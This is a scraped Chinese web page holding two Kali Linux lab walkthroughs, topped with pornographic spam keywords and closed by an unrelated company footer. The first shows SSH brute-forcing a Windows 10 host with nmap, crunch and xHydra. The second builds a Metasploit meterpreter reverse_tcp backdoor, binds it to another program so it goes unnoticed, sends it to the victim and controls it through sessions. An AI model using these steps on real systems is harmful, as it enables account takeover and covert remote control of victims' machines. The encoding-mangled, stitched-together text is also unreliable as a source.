欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊

    本內(nèi)容純屬技術(shù)記錄,切勿做違法事情

    環(huán)境

    受害方:win 10 (已部署好ssh環(huán)境)

    攻擊方:kali linux

    準(zhǔn)備

    win 10創(chuàng)建新用戶用來演示

    ip

    win10:10.1.1.20

    kali linux:10.1.1.128

    網(wǎng)關(guān):10.1.1.1

    正片開始

    使用諸神之眼(nmap),發(fā)現(xiàn)如下信息

    打開九頭蛇

    xhydra

    輸入win 10 ip,攻擊的端口,協(xié)議等

    創(chuàng)建賬號和密碼字典(演示所用,簡單創(chuàng)建)

    crunch 2 2 abc > 1.txt(賬號)

    crunch 3 3 123 > 2.txt(密碼)


    點(diǎn)擊xHydra中的passwords選項(xiàng),導(dǎo)入兩本字典

    點(diǎn)擊Tuning,修改進(jìn)程為40

    點(diǎn)擊Start,開始暴力破解,坐等結(jié)果

    (這一步實(shí)際上會很慢,一天半個(gè)月都正常,甚至?xí)]有結(jié)果)

    得到想要的賬戶密碼后

    使用命令成功登錄win10

    ssh aa@10.1.1.20

    至此,暴力破解成功

    從此刻開始,這臺win10危矣

    本文首發(fā)于“合天網(wǎng)安實(shí)驗(yàn)室”

    這個(gè)實(shí)驗(yàn)主要讓我們學(xué)習(xí)漏洞掃描技術(shù)基本原理,了解其在網(wǎng)絡(luò)攻防中的作用,掌握使用Kali中的Metasploit對目標(biāo)主機(jī)滲透,并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施。

    本次實(shí)戰(zhàn)環(huán)境:Kali滲透Windows服務(wù)器

    實(shí)戰(zhàn)步驟一

    本實(shí)驗(yàn)通過利用kali進(jìn)行漏洞掃描,使用Metasploit對目標(biāo)主機(jī)進(jìn)行滲透測試,并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施,共分為3個(gè)實(shí)驗(yàn)步驟,詳情如下;

    1、 實(shí)戰(zhàn)步驟一:生成setup.exe后門程序,即木馬程序。

    (1) 打開kali終端,輸入ifconfig, 得到本機(jī)ip為192.168.189.130。

    如下圖:


    (2)輸入以下命令,使用msfpayload生成名為setup的后門程序:

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:


    (3) 進(jìn)入setup.exe所在目錄,修改屬性:選擇“允許以程序執(zhí)行文件”。

    如下圖所示:


    (4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來設(shè)置本地主機(jī);然后輸入exploit -z -j開始監(jiān)聽,如下圖所示:


    實(shí)戰(zhàn)步驟二

    將上面生成的木馬程序與某個(gè)軟件進(jìn)行捆綁。

    (1)可以在windows系統(tǒng)下使用exe捆綁軟件將setup.exe和一個(gè)其他的某個(gè)安全軟件合并為一個(gè)軟件,這樣在運(yùn)行軟件時(shí)兩個(gè)軟件同時(shí)運(yùn)行,不會引起注意。在tools里面進(jìn)入名為exekunbang的文件,先打開ExeBinder.exe捆綁軟件。選擇第一個(gè)要合并的軟件,默認(rèn)選擇本軟件中自帶的小游戲程序:


    點(diǎn)擊下一步,選擇第二個(gè)要捆綁的軟件,即之前生成的木馬程序setup.exe:


    點(diǎn)擊下一步,選擇一個(gè)文件要保存的路徑:



    繼續(xù)點(diǎn)擊下一步,開始捆綁軟件:


    (2) 將捆綁后的軟件發(fā)送給目標(biāo)主機(jī)。


    實(shí)戰(zhàn)步驟三

    檢測目標(biāo)主機(jī),對目標(biāo)主機(jī)進(jìn)行滲透測試。

    (2) 目標(biāo)主機(jī)執(zhí)行程序后,在kali終端中的檢測程序會及時(shí)檢測到。在檢測到目標(biāo)主機(jī)運(yùn)行程序后,后門程序會反向連接到msf,之后msf發(fā)起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務(wù)端(msf)。輸入sessionss:


    可以看到目標(biāo)主機(jī)的ip為192.168.189.129,

    (2)再繼續(xù)輸入sessions -i 1,之后可以對目標(biāo)主機(jī)進(jìn)行一系列的操作。如輸入sysinfo可知道目標(biāo)主機(jī)的系統(tǒng)信息;輸入 getuid查看對方正在運(yùn)行的用戶。


    要養(yǎng)成多思考多總結(jié)的習(xí)慣,對實(shí)驗(yàn)結(jié)果多去分析,這樣回收獲更多。比如如何利用kali進(jìn)行漏洞掃描;如何使用Metasploit對目標(biāo)主機(jī)進(jìn)行滲透測試;這些都是這次實(shí)戰(zhàn)后可以去思考的。

網(wǎng)站首頁   |    關(guān)于我們   |    公司新聞   |    產(chǎn)品方案   |    用戶案例   |    售后服務(wù)   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區(qū)    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權(quán)所有